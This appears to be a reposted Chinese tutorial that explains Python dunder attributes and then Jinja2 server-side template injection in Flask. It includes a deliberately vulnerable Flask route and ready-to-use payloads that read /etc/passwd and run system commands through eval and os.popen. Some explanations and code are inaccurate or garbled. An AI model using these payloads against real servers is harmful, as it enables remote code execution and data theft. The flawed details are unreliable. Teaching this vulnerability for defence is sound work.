代码审计精品课程|python之SSTI漏洞介绍

news2024/12/22 23:34:35

SSTI模板注入

Python类

类(class)是Python中的一种基本的程序组织结构。它们允许定义一种新的数据类型,称为对象(object),并为该类型定义行为(即方法)。

Python中的类由关键字class定义。类包含一个类名称和类定义,类定义中包含属性和方法的声明。属性是类中的变量,方法是类中的函数。类中的方法可以访问类的属性,并且还可以在调用它们时访问该类的其他方法。

以下是一个简单的Python类的示例:

class Person: def __init__(self, name, age): self.name = name self.age = age def get_name(self): return self.name def get_age(self): return self.age

在上面的代码中,我们定义了一个名为“Person”的类,它有两个属性:name和age。该类还定义了两个方法:getname和getage。init方法是一种特殊的方法,它在创建对象时自动调用,并用于初始化对象的属性。

使用类来创建对象的过程称为实例化。要创建一个Person对象,我们可以使用以下代码:

person = Person("Alice", 25)

在上面的代码中,我们使用Person类创建了一个名为“person”的对象,并将其赋给一个变量。我们还向该对象传递了两个参数:名称“Alice”和年龄“25”。

一旦创建了对象,我们可以通过调用其方法来访问其属性:

print(person.get_name()) # Output: Alice print(person.get_age()) # Output: 25

通过这种方式,类允许我们定义一种新的数据类型,并在程序中创建多个该类型的对象。这使得代码更容易组织和管理,并使其更易于扩展。

Python 中的 魔术方法

__class__

在 Python 中,__class__ 是一个特殊属性,用于访问对象所属的类。当创建一个对象时,Python 会自动将该对象的类存储在 __class__ 属性中。

举个例子,假设定义了一个类 MyClass:

class MyClass: def __init__(self, name): self.name = name

然后创建了一个该类的实例:

my_obj = MyClass("example")

可以使用 __class__ 属性来获取 my_obj 对象所属的类:

print(my_obj.__class__)

输出:

<class '__main__.MyClass'>

注意,__class__ 属性是一个特殊的属性,通常情况下不需要直接访问它。相反,你应该使用 type() 函数来获取一个对象的类,例如:

print(type(my_obj))

输出:

<class '__main__.MyClass'>

这两种方法都可以用来获取对象的类。

__mro__

在 Python 中,每个类都有一个 Method Resolution Order(MRO)(方法解析顺序),它定义了解析方法和属性的顺序。在多重继承的情况下,类可以从多个父类继承方法和属性。MRO 确定了在这种情况下 Python 解析哪个方法或属性。

在 Python 中,每个类都有一个__mro__属性,它是一个元组,包含了类及其父类的顺序。当在一个类中调用方法或属性时,Python 将首先检查该类的__mro__属性中的第一个父类,然后是第二个,以此类推,直到找到所需的方法或属性。

例如,假设你有以下类:

class A: def foo(self): print("A.foo") class B(A): def foo(self): print("B.foo") class C(A): def foo(self): print("C.foo") class D(B, C): pass

这里类 D 继承自类 B 和 C,它们都继承自类 A。在这种情况下,类 D 的__mro__属性为:

(D, B, C, A, object)

当在类 D 中调用方法 foo() 时,Python 将首先检查类 B 中的 foo() 方法,然后是类 C 中的 foo() 方法,最后是类 A 中的 foo() 方法。

你可以使用以下代码访问类的__mro__属性:

print(D.__mro__)

__subclasses__

在 Python 中,每个类都是一个对象,可以有其自己的属性和方法。其中一个方法是 __subclasses__(),它可以返回当前类的直接子类列表。

具体地说,当调用一个类的 __subclasses__() 方法时,它会返回一个列表,其中包含所有直接从该类派生的子类。例如:

class A: pass class B(A): pass class C(A): pass print(A.__subclasses__()) # [__main__.B, __main__.C]

在这个例子中,我们定义了三个类:A,B 和 C。B 和 C 都是从 A 派生的子类。在 A 类的 __subclasses__() 方法中调用时,它返回一个包含 B 和 C 的列表。

需要注意的是,__subclasses__() 方法只返回直接子类,而不是所有子类。如果一个类有一个子类,而这个子类又有一个子类,那么 __subclasses__() 方法在父类上调用时,不会返回孙子类。

__init__

__init__ 是 Python 中一个特殊的方法(也称为魔术方法或构造函数),用于在创建对象时进行初始化操作。每当使用 class 关键字创建一个新类时,都会自动创建一个 __init__ 方法。该方法在创建对象时自动调用,并且必须作为第一个参数接受 self 参数,它表示正在创建的对象。

通常,在 __init__ 方法中,我们将对象的属性设置为其默认值或传入的参数值。例如:

class MyClass: def __init__(self, name, age): self.name = name self.age = age

在这个例子中,我们创建了一个名为 MyClass 的类,它有两个属性:name 和 age。在 __init__ 方法中,我们将传入的 name 和 age 参数分别赋值给了对象的 name 和 age 属性。这样,在创建一个 MyClass 对象时,我们就可以通过传入不同的参数值来初始化不同的对象。

需要注意的是,Python 中的类和对象都可以动态地添加属性和方法,因此 __init__ 方法并不是必须的。如果一个类没有定义 __init__ 方法,Python 会自动创建一个空的 __init__ 方法。但是,在大多数情况下,我们都需要在创建对象时进行一些初始化操作,因此 __init__ 方法是非常常用的。

__globals__

在 Python 中,__globals__ 是一个特殊属性,它包含一个字典,其中存储了当前作用域中所有的全局变量和函数。

具体地说,当在一个函数或方法内部访问 __globals__ 属性时,它会返回一个字典,其中包含了该函数或方法所在的模块中定义的所有全局变量和函数。例如:

x = 10 def my_func(): print(__globals__) my_func() # {'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <class '_frozen_importlib.BuiltinImporter'>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, 'x': 10, 'my_func': <function my_func at 0x000001>}

在这个例子中,我们定义了一个全局变量 x 和一个函数 my_func(),然后在 my_func() 函数中访问了 __globals__ 属性。在输出中,我们可以看到 __globals__ 返回了一个字典,其中包含了当前模块中定义的所有全局变量和函数。

需要注意的是,虽然 __globals__ 属性提供了一种访问全局变量和函数的方法,但通常不建议在函数内部直接使用它。这是因为,过度依赖全局变量会使代码难以理解和维护,并且会增加代码出错的可能性。因此,在编写 Python 代码时,应该尽可能避免使用全局变量,而是通过参数和返回值来传递数据。

__builtins__

在 Python 中,__builtins__ 是一个特殊属性,它包含了 Python 解释器默认提供的内置函数、变量和异常类的命名空间。也就是说,所有 Python 程序都可以直接使用 __builtins__ 中的内置函数、变量和异常类,而无需显式导入。

例如,我们可以在 Python 命令行解释器中直接访问 __builtins__:

>>> print(__builtins__) <module 'builtins' (built-in)>

在上面的示例中,我们访问了 __builtins__,并将其作为参数传递给 print() 函数。__builtins__ 返回了一个模块对象,表示 Python 解释器默认提供的内置函数、变量和异常类。

需要注意的是,尽管 __builtins__ 包含了很多有用的内置函数和变量,但在编写 Python 代码时,不应该滥用它。这是因为过度依赖内置函数和变量会使代码难以理解和维护,并且可能会导致命名冲突等问题。因此,应该尽可能使用模块、类、函数等封装机制,避免直接使用 __builtins__ 中的函数和变量。

SSTI模板注入

SSTI(Server-Side Template Injection,服务端模板注入)是一种Web应用程序安全漏洞,它允许攻击者向Web应用程序发送恶意请求,以注入并执行服务器端模板引擎中的代码。

模板引擎通常是用来处理动态内容的,例如生成HTML网页或电子邮件,可以允许程序员使用模板来组合预定义的HTML标记、JavaScript脚本和其他数据。模板引擎的基本工作原理是将模板和数据合并到一起,以生成最终输出。

在SSTI攻击中,攻击者向Web应用程序发送包含恶意模板代码的请求。如果应用程序未对这些代码进行充分验证和过滤,那么恶意代码将被注入到模板引擎中,然后被执行。这可能导致应用程序的机密信息泄露,或者使攻击者能够在受攻击的服务器上执行任意代码,从而完全接管服务器。

Python-Flask模板注入

Python-Flask 框架之所以会存在 SSTI 漏洞,是因为它使用 Jinja2 作为默认的模板引擎。Jinja2 是一个功能强大的模板引擎,它允许使用者在模板中使用变量和表达式来生成动态内容,但同时也可能导致模板注入漏洞。

在jinja2中,存在三种语法

控制结构 {% %} 变量取值 {{ }} 注释 {# #}

下面是一个简单的 Python-Flask 应用程序的代码示例,其中包含了一个 SSTI 漏洞:

from flask import Flask,render_template,request,render_template_string app = Flask(__name__) @app.route('/') def index():

return render_template("index.html") name = request.args.get('name', '') return render_template_string(name) if __name__ == '__main__': app.run()

在这个示例中,我们定义了一个简单的 Flask 应用程序,它有一个路由函数 index(),用于渲染一个名为 index.html 的模板。模板中包含了一个变量 {{name}},它用于显示用户输入的名称。

如果我们使用 Flask 内置的 Web 服务器来运行这个应用程序,并向 /?name=test 发送请求,那么页面将显示 "test"。这是因为 Flask 会将请求中的 name 参数传递给模板,并使用 Jinja2 来渲染模板。

然而,如果我们将请求中的 name 参数设置为一个包含恶意代码的字符串,比如

{{config.items()[0][1].__class__.__mro__[1].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('whoami').read()")}}

服务器就会执行这段代码,并返回一个包含敏感信息的响应。

这是因为在 Jinja2 中,双大括号 {{}} 中的任何表达式都会被求值并转义后插入到 HTML 中。如果用户可以控制这些表达式,就可以利用 SSTI 漏洞注入任意的 Python 代码,并在服务器上执行它们。

语法解析

config.items()

config.items() 是 Flask 应用程序的配置项字典,它包含了应用程序的所有配置选项和它们的值。在 Python 中,字典是一种键值对的数据结构,可以使用键来访问和修改值。

config.items() 返回一个包含所有配置项和它们的值的元组列表。每个元组包含两个元素,第一个元素是配置项的名称,第二个元素是配置项的值。

config.items()[0] 是元组列表的第一个元素,它包含了第一个配置项的名称和值。

因为这个元素也是一个元组,所以我们可以使用 [1] 来访问元组的第二个元素,即第一个配置项的值。因此

{ config.items()[0][1] }} 会返回 Flask 应用程序配置中第一个配置项的值,通常是应用程序的 DEBUG 配置项的值。

具体来说,当 Flask 应用程序渲染包含 {{ config.items()[0][1] }} 的模板时,Jinja2 模板引擎会首先调用 config.items() 方法,该方法返回一个包含所有配置项的列表,其中每个元素是一个包含键值对的元组。接着,模板引擎会对这个列表使用索引操作 [0] 获取第一个元素,也就是第一个键值对的元组。最后,模板引擎再次使用索引操作 [1] 获取该键值对的值,即 Flask 应用程序配置中第一个配置项的值。

由于 Flask 应用程序的默认配置中,第一个配置项是 DEBUG,因此 {{ config.items()[0][1] }} 通常会返回 False,即默认的 DEBUG 配置项的值。但是如果应用程序的配置中将 DEBUG 设置为 True,那么 {{ config.items()[0][1] }} 将会返回 True。

config.items()[0][1].__class__

如果在 Flask 应用程序中将 DEBUG 配置项设置为 True,那么使用 {{config.items()[1][1] }} 将返回 True,这是一个布尔值。

因此,如果使用 {{config.items()[1][1].__class__}} 来获取 DEBUG 配置项的值的类型,它将返回 <type 'bool'>,即布尔值类型。

config.items()[0][1].__class__.__mro__

config.items()[0][1] 是一个布尔值,它的类型是 <type 'bool'>。如果我们使用 __class__ 方法获取该对象所属的类,我们将得到 <type 'bool'>。然后,我们可以使用 __mro__ 属性获取该类的继承关系,即 <type 'bool'>, <type 'int'>, <type 'object'>。这是因为在 Python 中,布尔类型是从整数类型派生而来的,因此在其继承链中包含 int 类型。

config.items()[0][1].__class_.__mro__[1]

config.items()[0][1] 是一个布尔值,它的类型是 <class 'bool'>。我们可以使用 __class__ 方法获取该对象所属的类,然后使用 __mro__ 属性获取该类的继承关系,即 <class 'bool'>, <class 'int'>, <class 'object'>。因为 int 是 <class 'bool'> 的父类,所以 __subclasses__() 方法返回所有直接派生自 int 的子类,包括其他标准库和第三方库中的类。

config.items()[0][1].class.__mro__[1].__subclasses__()

__subclasses__() 是 Python 内置的一个方法,可以返回一个类的所有直接子类构成的列表。在这个列表中,每一个元素都是一个直接继承自父类的子类。

__subclasses__()[x] 表示取该列表中的第 x 个元素,也就是第 x+1 个直接子类。

{{config.items()[0][1].__class__.__mro__[2].__subclasses__()}} 返回的是所有继承自 <class 'object'> 的类的列表,其中包括Python标准库中定义的类以及用户自定义的类

config.items()[0][1].class.__mro__[1].__subclasses__()[x].__init_.__globals__

{{config.items()[0][1].__class__.__mro__[1].__subclasses__()[75].__init__.__globals__}} 返回的是一个包含当前环境中所有全局变量和它们的值的字典。在这个上下文中,config.items()[0][1].__class__.__mro__[1].__subclasses__()[75].__init__ 实际上是一个函数对象,它是Python标准库中一个特定的类的__init__方法。通过访问这个函数对象的__globals__属性,我们可以获取它所在的命名空间中的所有全局变量。

config.items()[0][1].__class__.__mro__[1].__subclasses__()[x].__init_.__globals__.__builtins__

{{config.items()[0][1].__class__.__mro__[1].__subclasses__()[75].__init__.__globals__.__builtins__}}

是一个模板注入的代码,它访问了当前 Python 运行环境中的内置模块,也就是 __builtins__。通过这段代码,攻击者可以利用 __builtins__ 模块中的任意函数来执行任意代码,例如在 Flask 应用中执行系统命令或者打开远程 shell 等。

由于 __builtins__ 是一个内置模块,其内部包含了许多 Python 的内置函数和对象,因此 {{config.items()[0][1].__class__.__mro__[1].__subclasses__()[x].__init__.__globals__.__builtins__}} 实际上返回了一个内置模块的字典,其中包含了所有内置函数和对象。可以通过访问这个字典来调用内置函数,例如

{{config.items()[0][1].__class__.__mro__[1].__subclasses__()[75].__init__.__globals__.__builtins__['eval']('__import__("os").popen("ls").read()')}}

上面的代码使用了 eval 函数来执行 __import__("os").popen("ls").read() 代码,这段代码会执行系统命令 ls 并将结果返回。因此,这个模板注入的代码会返回当前目录下的文件列表。

常见SSTI的payload

文件读写

{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}} {{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

命令执行

{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['eval']("__import__('os').system('whoami')")}} {{config.items()[0][1].__class__.__mro__[1].__subclasses__()[75].__init__.__globals__.__builtins__['eval']('__import__("os").popen("ls").read()')}} {{().__class__.__bases__[0].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/600615.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【shiro】subject.login(token)流程源码分析

前言 之前在写【Shiro】SimpleAuthenticationInfo如何验证password的时候&#xff0c;了解了下验证方式的源码&#xff0c;但在做shiro整合Jwt时&#xff0c;debug发现执行的顺序和理解的不太一样&#xff0c;因此&#xff0c;中途插篇了解下这个login的源码&#xff0c;看看它…

VisualAssist v10.9.2491 NEW-Crack

VisualAssist 为 C/C 和 C# 开发人员填补 Visual Studio 中的空白 快速导航 以全新的方式轻松移动您的代码 — 移动到您的项目和解决方案中的任何文件、方法、符号或引用。从任何地方到达任何地方。 与其他类型的功能一样&#xff0c;Visual Assist 的导航功能对于 IDE 来说是全…

开发者必读指南:必须知道的关键性能指标,提升代码性能

1、性能指概述 在Web应用程序的开发过程中&#xff0c;性能是一个至关重要的问题。高性能的Web应用程序需要快速响应&#xff0c;并能够处理大量的并发请求。而为了评估Web应用程序的性能状况&#xff0c;我们需要关注一些关键的性能指标。本文将介绍一些常见的Web项目性能指标…

【网络】· 路由交换设备远程管理,以及VLAN的配置

目录 &#x1f349;配置管理IP地址 &#x1f95d;配置VTY密码 &#x1f95d;配置默认网关 &#x1f349;虚拟局域网&#xff08;VLAN&#xff09; &#x1f95d;VLAN的概念 &#x1f95d;VLAN范围 &#x1f95d;VLAN基本配置 &#x1f34c;创建VLAN &#x1f34c;删除VLAN &…

chatgpt赋能python:Python利用数据可视化出图,为SEO拓展新思路

Python利用数据可视化出图&#xff0c;为SEO拓展新思路 数据可视化出图在SEO领域中是非常重要的&#xff0c;它不仅能丰富网站内容&#xff0c;还能提高用户体验。而Python语言在数据处理和可视化方面具有很大的优势&#xff0c;让我们一起来看看如何利用Python出图来拓展SEO应…

制造业大型企业为什么需要做采购数字化转型?

大型制造企业要在采购方面进行数字化转型&#xff0c;原因如下&#xff1a; 成本优化&#xff1a;采购中的数字化转型使组织能够简化采购流程、自动化手动任务并消除低效率。通过减少采购周期时间、消除特立独行的支出以及提高与供应商谈判能力来实现成本优化。 改进可见性和分…

Java --- springboot3之日志管理

目录 一、日志整合原理 1.1、简介 1.2、日志格式 1.3、记录日志 1.4、日志级别 1.5、日志分组 1.6、日志文件输出 1.7、文件归档与滚动切割 1.8、自定义日志系统 一、日志整合原理 规范&#xff1a;项目开发不要编写System.out.println()&#xff0c;应该用日志记录信息…

chatgpt赋能python:Python出不来图像如何解决?——Python编程经验分享

Python出不来图像如何解决&#xff1f;——Python编程经验分享 Python是一门非常强大的编程语言&#xff0c;常用于数据处理、Web后端开发、爬虫等领域&#xff0c;但有时候在开发过程中&#xff0c;你可能会遇到Python出不来图像的情况。这时候该怎么办呢&#xff1f;本文将从…

c++跨平台串口库(serial)

c跨平台串口库(serial) serial资源链接 创建工程 工程目录如下&#xff1a; .vscode&#xff1a; 使用vsocde自动生成的3rd: 里面放第三方库include&#xff1a; 放源代码的头文件src&#xff1a;放源代码 这里我创建了一个简单的demo工程&#xff0c;只有一个main.cpp。 …

双向认证证书生成过程

https://help.aliyun.com/document_detail/160093.html 如果是自签名的证书&#xff0c;那需要生成根证书 生成根证书 生成根私钥 openssl genrsa -out root.key 2048 生成根的csr文件 openssl req -new -out root.csr -key root.key Country Name (2 letter code) [XX]:cn…

springboot 本地/minio 附件下载优化

文章目录 前言一、Direct buffer memory1.1 原因分析1.2 解决方案 二、附件下载2.1 问题分析2.2 解决方案2.2.1 本地下载2.2.1 minio下载 前言 本地上传大文件内存溢出 Direct buffer memory附件下载服务端传流给前端需要将流缓存完毕才可以下载&#xff0c;导致大文件下载系统…

C语言指针:深入理解与应用

C语言指针&#xff1a;深入理解与应用 指针作为C语言的核心概念之一&#xff0c;对于学习C语言的程序员来说具有重要意义。本文将详细介绍C语言指针的基本概念、运算符、指针与数组的关系、函数指针以及指针的常见应用场景等。通过阅读本文&#xff0c;你将对C语言指针有更深入…

【Java多线程进阶】线程池详解

前言 在大量的并发任务中&#xff0c;频繁的创建和销毁线程对系统的开销是非常大的&#xff0c;多个任务执行的速度也是非常慢的。因此&#xff0c;设计出一个好的 Java 线程池就可以减少系统的开销、使程序运行速度提升。在这篇博文中&#xff0c;我将介绍 Java 线程池概念以及…

RocketMq-主从集群搭建

目录 1.服务器列表 2.下载安装包 3.node1节点修改runserver.sh文件 4. 所有节点安装jdk 5. node1节点配置RocketMQ集群 1.配置node1节点borker-a的master配置文件 2.配置node2节点配置borker-a的slave borker-a-s节点 3.配置node3节点配置borker-b的master节点 4.配置…

【Python】Python系列教程--Python3 基本数据类型(五)

文章目录 前言多个变量赋值标准数据类型Number&#xff08;数字&#xff09;数值运算数值类型实例String&#xff08;字符串&#xff09;List&#xff08;列表&#xff09;Tuple&#xff08;元组&#xff09;Set&#xff08;集合&#xff09;Dictionary&#xff08;字典&#x…

低代码开发重要工具:jvs-rules 规则引擎功能介绍(三)

一、JVS规则引擎的决策流可视化组成 决策流的可视化拼装 规则引擎是由多个组件组成的&#xff0c;这些组件共同协作实现规则的管理、执行和决策流的构建。 决策流&#xff1a;决策流是由多个业务节点连接而成的流程&#xff0c;用于实现复杂的业务逻辑。决策流中的业务节点按…

Rust安装手册

Rust 环境搭建 Rust 支持很多的集成开发环境&#xff08;IDE&#xff09;或开发专用的文本编辑器。 官方网站公布支持的工具如下&#xff08;https://www.rust-lang.org/zh-CN/tools&#xff09;&#xff1a; 本教程将使用 Visual Studio Code 作为我们的开发环境&#xff08…

NIO之Selector解读

目录 Selector 简介 为什么会出现Selector Selector 和 Channel 关系 可选择通道(SelectableChannel) Channel 注册到 Selector 选择键(SelectionKey) Selector 的使用方法 Selector 的创建 注册 Channel 到 Selector 轮询查询就绪操作 停止选择的方法 Selector 简…

全志Tina Linux下如何编译glibc库

本文整理自问答&#xff1a;https://bbs.aw-ol.com/topic/3615/ make工具 注意由于AW服务器make版本为3.8.1&#xff0c;在编译glibc高版本时候不兼容&#xff0c;所以需要更新make工具。假如服务器make版本较高&#xff0c;可以不用更新make工具。 网址 http://ftp.gnu.org/…

chatgpt赋能python:Python函数介绍

Python函数介绍 函数是Python编程中最重要的概念之一。它是一段可重用代码的集合&#xff0c;通过一个名字来暴露出来&#xff0c;可以在Python程序的多个地方调用。函数可以接收任意数量的参数&#xff0c;也可以返回值。Python中函数定义使用关键字 def。 Python函数定义 …